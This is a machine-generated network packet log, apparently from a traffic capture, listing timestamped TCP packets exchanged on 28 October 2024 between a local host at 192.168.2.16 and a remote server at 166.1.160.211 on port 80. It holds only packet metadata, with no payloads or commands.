                                                                                                                                                              Oct 28, 2024 19:46:20.363605022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363640070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363648891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.363672972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363711119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363725901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.363915920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363950014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363965034 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364001989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364043951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364144087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364176989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364211082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364227057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364248037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364294052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364460945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364495039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364528894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364536047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364563942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364609957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364772081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364801884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364835978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364845037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364870071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364902973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364912987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.364937067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364969015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.364984035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.365194082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365221977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365237951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.365256071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365289927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365303040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.365324020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365359068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365372896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.365612984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365648985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365659952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.365681887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365715027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365731955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.365751028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.365793943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.366133928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366167068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366214991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.366215944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366250038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366285086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366296053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.366318941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366353035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366367102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.366385937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366419077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366430998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.366451979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.366497993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.366502047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367074966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367108107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367125988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.367144108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367177010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367191076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.367209911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367244005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367260933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.367280006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367327929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367331028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.367363930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367396116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367403030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.367429972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367461920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.367480993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.368066072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368098974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368119955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.368129969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368165970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368180990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.368197918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368231058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368241072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.368266106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368299961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368319035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.368331909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368366957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368381023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.368395090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.368439913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.378571033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.418412924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.418504953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.418539047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.418559074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.418591976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.418644905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.418935061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.418987989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419040918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419101000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419135094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419184923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419250011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419301987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419348001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419354916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419389963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419435024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419668913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419718981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419764996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419771910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419817924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419850111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419862986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419884920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419919968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419939041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.419951916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.419987917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420003891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.420525074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420557976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420567989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.420592070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420624018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420634985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.420656919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420689106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420706987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.420722961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420757055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420767069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.420790911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.420840979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.421127081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421178102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421211004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421221018 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.421243906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421278954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421289921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.421313047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421346903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421356916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.421380997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421416044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421426058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.421452045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.421497107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422075033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422107935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422142029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422157049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422175884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422210932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422219992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422244072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422282934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422295094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422316074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422353029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422365904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422384977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422416925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422430992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422446012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422489882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423042059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423077106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423109055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423125982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423142910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423173904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423197985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423207998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423242092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423253059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423278093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423310995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423326015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423362017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423396111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423410892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423430920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423464060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423479080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423886061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423938990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424002886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424036980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424066067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424096107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424098969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424133062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424144030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424165964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424200058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424211025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424233913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424269915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424280882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424303055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424336910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424344063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424371958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424405098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424412966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.426564932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.435683966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435736895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435739994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.435770035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435811996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.435903072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435936928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435971022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435985088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436054945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436100006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436194897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436227083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436263084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436273098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436295986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436328888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436341047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436362982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436413050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436624050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436657906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436691046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436705112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436724901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436774969 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436980009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437012911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437047005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437067986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437081099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437114000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437124968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437141895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437175035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437180042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437211037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437242031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437261105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437275887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437310934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437315941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437827110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437860012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437865973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437908888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437942028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.437949896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.437977076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438010931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438020945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438045979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438076973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438105106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438112020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438139915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438157082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438597918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438631058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438646078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438664913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438699007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438709021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438731909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438765049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438777924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438797951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438829899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438838005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438864946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438899040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438915014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.438932896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438965082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.438972950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.439548969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.439584017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.439599991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.439619064 CET8049726166.1.160.211192.168.2.16
